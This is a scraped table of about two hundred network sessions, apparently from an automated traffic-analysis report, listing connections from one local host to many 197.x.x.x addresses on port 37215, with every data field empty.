                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21365192.168.2.1541772197.166.75.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21366192.168.2.1560592197.235.156.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21367192.168.2.1542086197.109.165.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21368192.168.2.1547206197.175.186.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21369192.168.2.1544372197.175.158.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21370192.168.2.1534816197.7.54.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21371192.168.2.1549442197.100.121.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21372192.168.2.1540832197.251.235.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21373192.168.2.1539956197.53.95.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21374192.168.2.1544620197.147.228.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21375192.168.2.1543934197.94.185.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21376192.168.2.1533390197.165.210.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21377192.168.2.1543216197.190.56.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21378192.168.2.1548804197.26.144.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21379192.168.2.1542666197.104.158.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21380192.168.2.1558364197.49.95.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21381192.168.2.1539598197.235.170.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21382192.168.2.1549458197.193.179.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21383192.168.2.1539198197.152.48.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21384192.168.2.1542234197.219.205.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21385192.168.2.1540992197.7.241.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21386192.168.2.1543962197.166.94.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21387192.168.2.1556528197.187.221.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21388192.168.2.1545732197.61.39.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21389192.168.2.1540368197.214.39.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21390192.168.2.1547946197.184.113.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21391192.168.2.1560214197.84.65.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21392192.168.2.1533182197.28.150.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21393192.168.2.1537262197.96.212.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21394192.168.2.1542728197.136.24.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21395192.168.2.1552290197.202.108.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21396192.168.2.1558044197.29.237.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21397192.168.2.1540620197.28.204.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21398192.168.2.1533988197.106.107.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21399192.168.2.1555076197.41.43.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21400192.168.2.1537484197.194.57.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21401192.168.2.1554936197.10.148.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21402192.168.2.1537158197.126.173.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21403192.168.2.1556078197.213.57.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21404192.168.2.1548114197.108.172.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21405192.168.2.1534500197.189.10.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21406192.168.2.1555574197.162.179.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21407192.168.2.1560672197.114.67.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21408192.168.2.1534668197.226.42.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21409192.168.2.1558330197.89.237.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21410192.168.2.1559820197.67.86.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21411192.168.2.1539862197.230.117.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21412192.168.2.1544856197.0.226.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21413192.168.2.1547078197.0.0.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21414192.168.2.1546676197.227.118.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21415192.168.2.1546270197.196.162.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21416192.168.2.1554718197.83.37.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21417192.168.2.1540976197.0.99.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21418192.168.2.1554200197.156.167.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21419192.168.2.1558420197.27.243.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21420192.168.2.1550428197.146.154.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21421192.168.2.1537518197.132.43.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21422192.168.2.1533964197.82.138.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21423192.168.2.1538398197.238.18.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21424192.168.2.1549950197.185.139.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21425192.168.2.1536952197.124.106.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21426192.168.2.1558080197.109.14.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21427192.168.2.1554244197.74.66.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21428192.168.2.1543622197.66.217.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21429192.168.2.1547926197.21.188.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21430192.168.2.1552820197.72.149.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21431192.168.2.1547704197.207.113.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21432192.168.2.1546210197.107.60.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21433192.168.2.1560524197.29.43.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21434192.168.2.1559252197.136.128.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21435192.168.2.1556492197.62.4.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21436192.168.2.1541554197.58.191.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21437192.168.2.1537122197.43.226.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21438192.168.2.1535914197.146.167.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21439192.168.2.1538480197.67.109.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21440192.168.2.1551142197.251.88.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21441192.168.2.1554608197.35.55.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21442192.168.2.1536598197.97.195.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21443192.168.2.1542628197.103.7.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21444192.168.2.1546266197.194.250.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21445192.168.2.1556814197.112.66.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21446192.168.2.1542238197.19.68.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21447192.168.2.1553166197.252.244.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21448192.168.2.1538636197.53.117.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21449192.168.2.1545502197.41.23.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21450192.168.2.1540962197.92.20.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21451192.168.2.1560652197.99.66.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21452192.168.2.1546074197.251.155.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21453192.168.2.1554736197.191.36.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21454192.168.2.1552952197.195.251.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21455192.168.2.1546086197.91.31.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21456192.168.2.1542342197.159.26.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21457192.168.2.1547480197.8.206.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21458192.168.2.1540630197.103.8.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21459192.168.2.1536150197.228.165.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21460192.168.2.1550058197.245.75.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21461192.168.2.1536950197.169.157.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21462192.168.2.1533562197.7.211.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21463192.168.2.1560088197.76.70.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21464192.168.2.1549642197.100.236.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21465192.168.2.1548086197.242.98.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21466192.168.2.1541104197.228.216.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21467192.168.2.1542192197.241.24.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21468192.168.2.1552768197.9.173.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21469192.168.2.1538162197.96.184.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21470192.168.2.1559280197.103.225.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21471192.168.2.1539018197.236.108.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21472192.168.2.1548522197.225.221.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21473192.168.2.1539610197.236.180.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21474192.168.2.1551448197.249.98.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21475192.168.2.1560380197.33.184.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21476192.168.2.1533688197.131.111.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21477192.168.2.1546478197.152.19.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21478192.168.2.1545030197.186.175.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21479192.168.2.1555346197.136.29.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21480192.168.2.1538546197.5.209.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21481192.168.2.1551382197.175.151.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21482192.168.2.1544994197.162.138.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21483192.168.2.1551784197.19.170.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21484192.168.2.1540404197.74.163.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21485192.168.2.1554204197.173.196.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21486192.168.2.1555120197.77.10.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21487192.168.2.1533668197.64.157.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21488192.168.2.1539660197.159.125.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21489192.168.2.1534892197.149.235.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21490192.168.2.1551196197.89.247.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21491192.168.2.1552994197.66.62.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21492192.168.2.1538444197.35.246.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21493192.168.2.1538248197.206.99.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21494192.168.2.1533004197.100.53.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21495192.168.2.1554096197.117.164.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21496192.168.2.1533138197.133.170.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21497192.168.2.1541112197.186.206.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21498192.168.2.1556590197.10.68.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21499192.168.2.1558882197.97.94.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21500192.168.2.1542856197.62.204.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21501192.168.2.1556554197.176.189.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21502192.168.2.1552910197.185.176.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21503192.168.2.1547820197.229.226.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21504192.168.2.1534986197.38.137.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21505192.168.2.1538970197.47.162.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21506192.168.2.1555872197.139.197.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21507192.168.2.1542310197.96.162.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21508192.168.2.1550764197.247.210.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21509192.168.2.1537474197.104.187.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21510192.168.2.1535096197.227.76.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21511192.168.2.1550466197.163.168.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21512192.168.2.1545416197.211.88.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21513192.168.2.1560828197.176.53.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21514192.168.2.1555982197.69.144.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21515192.168.2.1538408197.226.89.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21516192.168.2.1551956197.218.51.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21517192.168.2.1548638197.155.3.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21518192.168.2.1537824197.249.87.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21519192.168.2.1560140197.81.185.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21520192.168.2.1533570197.151.255.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21521192.168.2.1557868197.13.105.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21522192.168.2.1559170197.221.127.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21523192.168.2.1554496197.94.119.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21524192.168.2.1540772197.201.216.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21525192.168.2.1560868197.226.94.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21526192.168.2.1547590197.77.141.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21527192.168.2.1553124197.229.21.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21528192.168.2.1546880197.89.122.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21529192.168.2.1539660197.200.89.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21530192.168.2.1544968197.235.36.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21531192.168.2.1539026197.111.82.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21532192.168.2.1534058197.232.133.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21533192.168.2.1558864197.37.121.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21534192.168.2.1552278197.34.3.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21535192.168.2.1537372197.208.7.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21536192.168.2.1541256197.145.69.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21537192.168.2.1560790197.204.164.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21538192.168.2.1540196197.192.107.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21539192.168.2.1557198197.211.130.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21540192.168.2.1538554197.246.74.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21541192.168.2.1540134197.29.91.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21542192.168.2.1557612197.206.141.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21543192.168.2.1552638197.21.85.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21544192.168.2.1560790197.12.145.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21545192.168.2.1542570197.111.138.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21546192.168.2.1543220197.206.139.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21547192.168.2.1553406197.237.213.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21548192.168.2.1546918197.208.167.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21549192.168.2.1555080197.4.19.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21550192.168.2.1536894197.115.1.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21551192.168.2.1542792197.6.117.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21552192.168.2.1559558197.127.57.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21553192.168.2.1536326197.36.149.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21554192.168.2.1554048197.252.160.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21555192.168.2.1543390197.67.181.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21556192.168.2.1538582197.110.45.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21557192.168.2.1537666197.157.221.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21558192.168.2.1552528197.238.180.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21559192.168.2.1551732197.112.26.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21560192.168.2.1534370197.187.252.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21561192.168.2.1543716197.132.45.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21562192.168.2.1558554197.148.204.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21563192.168.2.1551652197.48.40.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21564192.168.2.1533688197.33.134.22937215
